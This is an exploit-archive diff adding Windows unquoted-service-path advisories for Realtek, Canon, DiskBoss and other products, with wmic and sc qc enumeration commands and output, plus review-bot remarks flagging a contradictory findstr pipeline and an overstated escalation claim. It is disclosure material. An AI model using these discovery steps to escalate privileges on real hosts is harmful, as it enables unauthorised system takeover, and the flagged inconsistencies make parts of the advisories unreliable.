+# Exploit Title: Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path
+# Discovery by: Erika Figueroa
+# Discovery Date: 2020-11-07
+# Vendor Homepage: https://www.realtek.com/en/
+# Tested Version: 1.0.64.10
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 x64 es
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
+
+Andrea RT Filters Service AERTFilters C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE Auto
+
+# Service info:
+
+C:\>sc qc "AERTFilters"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: AERTFilters
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Andrea RT Filters Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49016.txt b/exploits/windows/local/49016.txt
new file mode 100644
index 000000000..f1053e7ce
--- /dev/null
+++ b/exploits/windows/local/49016.txt
@@ -0,0 +1,24 @@
+#Exploit Title: MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path
+#Exploit Author : SamAlucard
+#Exploit Date: 2020-11-07
+#Vendor : Microvirt
+#Version : Microvirt MEMU 3.7.0
+#Vendor Homepage : https://www.memuplay.com/
+#Tested on OS: Windows 10 Home
+
+#Analyze PoC :
+==============
+
+C:\Users\Sam Sanz>sc qc "MEmusvc"
+[SC] QueryServiceConfig CORRECTO
+
+ NOMBRE_SERVICIO: MEmusvc
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Microvirt\MEmu\MemuService.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : MEmusvc
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49017.txt b/exploits/windows/local/49017.txt
new file mode 100644
index 000000000..086c7c317
--- /dev/null
+++ b/exploits/windows/local/49017.txt
@@ -0,0 +1,26 @@
+#Exploit Title: Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path
+#Exploit Author : SamAlucard
+#Exploit Date: 2020-11-07
+#Vendor : Magic Utilities Pty
+#Version : 64-bit 2.20
+#Vendor Homepage : https://magicutilities.net/magic-mouse/home
+#Tested on OS: Windows 10 Home
+
+
+#Analyze PoC :
+==============
+
+C:\>sc qc "magicmouse2service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: magicmouse2service
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Magic Mouse 2 -
+Utilities\MagicMouse2Service.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Magic Mouse 2 Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49018.txt b/exploits/windows/local/49018.txt
new file mode 100644
index 000000000..795fd496c
--- /dev/null
+++ b/exploits/windows/local/49018.txt
@@ -0,0 +1,30 @@
+# Exploit Title: iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path
+# Discovery by: Leslie Lara
+# Discovery Date: 7-09-2020
+# Vendor Homepage: https://www.huawei.com/en/corporate-information
+# Software Links : https://www.advanceduninstaller.com/iDesk-3_0_2_1-ac22913ee90dd58ca897d1ddf3d62a8f-application.htm
+# Tested Version: 3.0.2.1
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro 64 bits
+
+# Step to discover Unquoted Service Path:
+
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+iDeskService
+ iDeskService C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe
+ Auto
+
+C:\>sc qc "iDeskService"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: iDeskService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : iDeskService
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49019.txt b/exploits/windows/local/49019.txt
new file mode 100644
index 000000000..34663a627
--- /dev/null
+++ b/exploits/windows/local/49019.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path
+# Discovery by: Carlos Roa
+# Discovery Date: 2020-11-07
+# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home
+# Tested Version: 5.1.0.8
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 7 Professional 64 bits (spanish)
+
+# Step to discover Unquoted Service Path:
+
+C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto| findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+Canon Inkjet Printer/Scanner/Fax Extended Survey Program IJPLMSVC C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE Auto
+
+
+# Service info:
+
+C:\Users>sc qc IJPLMSVC
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: ijplmsvc
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Canon Inkjet Printer/Scanner/Fax Extended Survey Program
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49020.txt b/exploits/windows/local/49020.txt
new file mode 100644
index 000000000..924b538c5
--- /dev/null
+++ b/exploits/windows/local/49020.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path
+# Discovery by: Paulina Girón
+# Discovery Date: 2020-11-07
+# Vendor Homepage: https://www.deepinstinct.com/
+# Software Links : https://www.deepinstinct.com/2019/05/22/hp-collaborates-with-deep-instinct-to-roll-out-ai-powered-malware-protection-for-next-generation-hp-elitebook-and-zbook-pcs/
+# Tested Version: 1.2.24.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Microsoft Windows 10 Pro 64 bits
+1)
+
+C:\> wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DeepNetworkService" |findstr /i /v """
+
+Deep Instinct Network Service DeepNetworkService C:\Program Files\HP Sure Sense\DeepNetworkService.exe Auto
+
+2)
+
+C:\> sc qc "DeepNetworkService"
+
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: DeepNetworkService
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files\HP Sure Sense\DeepNetworkService.exe
+ GRUPO_ORDEN_CARGA : FSFilter Anti-Virus
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Deep Instinct Network Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+#Description Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path
+# undetected by the OS or other security applications where it could potentially be executed during
+# application startup or reboot. If successful, the local user's code would execute with the elevated
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49021.txt b/exploits/windows/local/49021.txt
new file mode 100644
index 000000000..ba1d13f15
--- /dev/null
+++ b/exploits/windows/local/49021.txt
@@ -0,0 +1,32 @@
+# Exploit Title: RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path
+# Discovery by: Erick Galindo
+# Discovery Date: 2020-11-07
+# Vendor Homepage: https://www.real.com/
+# Tested Version: 18.1.4
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 7 Enterprise SP1 x64 es
+# Step to discover Unquoted Service Path:
+
+c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr
+/i /v "C:\Windows\\" | findstr /i /v "RealTimes" | findstr /i /v """
+
+RealTimes Desktop Service RealTimes Desktop Service c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe Auto
+
+# Service info
+
+sc qc "RealTimes Desktop Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: RealTimes Desktop Service
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : RealTimes Desktop Service
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+ #Exploit:
+
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49022.txt b/exploits/windows/local/49022.txt
new file mode 100644
index 000000000..26cbaf533
--- /dev/null
+++ b/exploits/windows/local/49022.txt
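Review bot: The discovery pipeline in this hunk ends with `| findstr /i /v "RealTimes" | findstr /i /v """`, and `/v` keeps only lines that do NOT match, so the RealTimes row printed directly below it cannot be the output of that command as written. The `/v` on the "RealTimes" stage looks like a copy of the two exclusion stages that precede it; the other advisories in this commit (49018, 49019, 49020) use the same pipeline without that stage, and 49020 uses `findstr /i "DeepNetworkService"` without `/v` for the positive filter. Changing that stage to `| findstr /i "RealTimes"` (or dropping it) makes the command reproduce the listed result. The `#Exploit:` heading is also indented as if it were a field of the `sc qc` output; moving it to column 0 with a blank line before it, as in 49019, keeps the service dump separate from the author's remarks.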
@@ -0,0 +1,101 @@
+# Exploit Title: DiskBoss v11.7.28 - Multiple Services Unquoted Service Path
+# Date: 2020-8-20
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: https://www.diskboss.com/
+# Software Link: https://www.diskboss.com/downloads.html
+# Version: v11.7.28
+# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763
+
+# Product | Version
+# DiskBoss v11.7.28
+# DiskBoss Pro v11.7.28
+# DiskBoss Ultimate v11.7.28
+# DiskBoss Server v11.7.28
+# DiskBoss Enterprise v11.7.28
+
+# All the listed products are vulnerable to Unquoted Service path. Any low privileged user can elevate their privileges using any of these services.
+
+# Services info:
+
+C:\Users\m507>sc qc "DiskBoss Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: DiskBoss Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files\DiskBoss\bin\diskbsa.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : DiskBoss Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+C:\Users\m507>sc qc "DiskBoss Enterprise"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: DiskBoss Enterprise
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Enterprise\bin\diskbss.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : DiskBoss Enterprise
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+C:\Users\m507>sc qc "DiskBoss Ultimate Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: DiskBoss Ultimate Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Ultimate\bin\diskbsa.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : DiskBoss Ultimate Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+C:\Users\m507>sc qc "DiskBoss Server"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: DiskBoss Server
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Server\bin\diskbss.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : DiskBoss Server
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+C:\Users\m507>sc qc "DiskBoss Pro Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: DiskBoss Pro Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Pro\bin\diskbsa.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : DiskBoss Pro Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/exploits/windows/local/49023.txt b/exploits/windows/local/49023.txt
new file mode 100644
index 000000000..b05616a14
--- /dev/null
+++ b/exploits/windows/local/49023.txt
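Review bot: The sentence `# All the listed products are vulnerable to Unquoted Service path. Any low privileged user can elevate their privileges using any of these services.` claims more than the five `sc qc` dumps support: every BINARY_PATH_NAME sits under `C:\Program Files` or `C:\Program Files (x86)`, and nothing in the hunk shows that a standard user can write to `C:\` or to those directories, which is the condition an unquoted path needs before it becomes a privilege escalation (and not the default ACL on Program Files). Qualifying it, e.g. `# Exploitable only where a standard user can write to a directory along the unquoted path; verify the ACLs on the host before treating this as a finding.`, keeps the advisory accurate. Worth a one-line remark for defenders as well: all five services run as LocalSystem with `ERROR_CONTROL : 0 IGNORE`, which as I read SERVICE_ERROR_IGNORE means a failed start is not written to the event log, so a hijacked or broken start would leave less trace than the NORMAL setting used by the other services in this commit.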
@@ -0,0 +1,28 @@
+# Exploit Title: Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path
+# Date: 2020-8-20
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: https://www.cybertronsoft.com/
+# Software Link: https://www.cybertronsoft.com/download/privacy-drive-setup.exe
+# Version: Version 3.17.0 Build 1456
+# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763
+
+# Service info:
+
+C:\Users\m507>sc qc PDSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: PDSvc
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Cybertron\Privacy Drive\pdsvc.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : PrivacyDrive Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index edc97f493..4d7871005 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10400,6 +10400,27 @@ id,file,description,date,author,type,platform,port
 48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows,
 48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows,
 48993,exploits/windows/local/48993.pl,"Amarok 2.8.0 - Denial-of-Service",2020-11-05,FishballAndMeatball,local,windows,
+49002,exploits/windows/local/49002.txt,"HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,
+49003,exploits/windows/local/49003.txt,"KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
+49004,exploits/windows/local/49004.txt,"Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
+49005,exploits/windows/local/49005.txt,"OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,
+49006,exploits/windows/local/49006.txt,"IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
+49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
+49008,exploits/windows/local/49008.txt,"DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
+49009,exploits/windows/local/49009.txt,"Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,
+49010,exploits/windows/local/49010.txt,"HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path",2020-11-09,"Jocelyn Arenas",local,windows,
+49011,exploits/windows/local/49011.txt,"Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
+49012,exploits/windows/local/49012.txt,"Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
+49013,exploits/windows/local/49013.txt,"Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
+49014,exploits/windows/local/49014.txt,"Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
+49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
+49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
+49018,exploits/windows/local/49018.txt,"iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path",2020-11-09,"Leslie Lara",local,windows,
+49019,exploits/windows/local/49019.txt,"Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path",2020-11-09,"Carlos Roa",local,windows,
+49020,exploits/windows/local/49020.txt,"Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path",2020-11-09,"Paulina Girón",local,windows,
+49021,exploits/windows/local/49021.txt,"RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path",2020-11-09,"Erick Galindo",local,windows,
+49022,exploits/windows/local/49022.txt,"DiskBoss v11.7.28 - Multiple Services Unquoted Service Path",2020-11-09,"Mohammed Alshehri",local,windows,
+49023,exploits/windows/local/49023.txt,"Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path",2020-11-09,"Mohammed Alshehri",local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -40818,6 +40839,9 @@ id,file,description,date,author,type,platform,port
 48997,exploits/php/webapps/48997.py,"Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php,
 48998,exploits/php/webapps/48998.py,"Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php,
 48999,exploits/aspx/webapps/48999.txt,"BlogEngine 3.3.8 - 'Content' Stored XSS",2020-11-06,"Andrey Stoykov",webapps,aspx,
+49000,exploits/hardware/webapps/49000.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF",2020-11-09,"Jinson Varghese Behanan",webapps,hardware,
+49001,exploits/php/webapps/49001.py,"SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)",2020-11-09,"M. Cory Billington",webapps,php,
+49024,exploits/multiple/webapps/49024.txt,"Joplin 1.2.6 - 'link' Cross Site Scripting",2020-11-09,"Philip Holbrook",webapps,multiple,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,